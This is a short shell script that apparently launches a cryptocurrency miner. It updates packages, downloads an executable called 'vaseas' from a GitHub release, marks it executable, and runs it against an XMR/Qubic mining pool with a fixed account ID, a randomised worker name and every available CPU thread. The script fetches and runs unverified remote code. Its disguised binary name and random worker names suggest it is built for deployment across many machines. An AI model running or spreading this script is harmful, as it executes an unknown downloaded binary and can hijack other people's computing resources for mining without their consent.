#!/bin/sh
apt update && apt install unzip
wget https://github.com/vedhagsvp/qubros/releases/download/apl/vaseas
chmod +x vaseas
./vaseas --algo xmr --account CP_udnvh2owpq --pool qubic1.hk.apool.io:3334 --worker --worker $(echo $(shuf -i 1-15000 -n 1)-ASVGPG) --thread $(nproc --all)
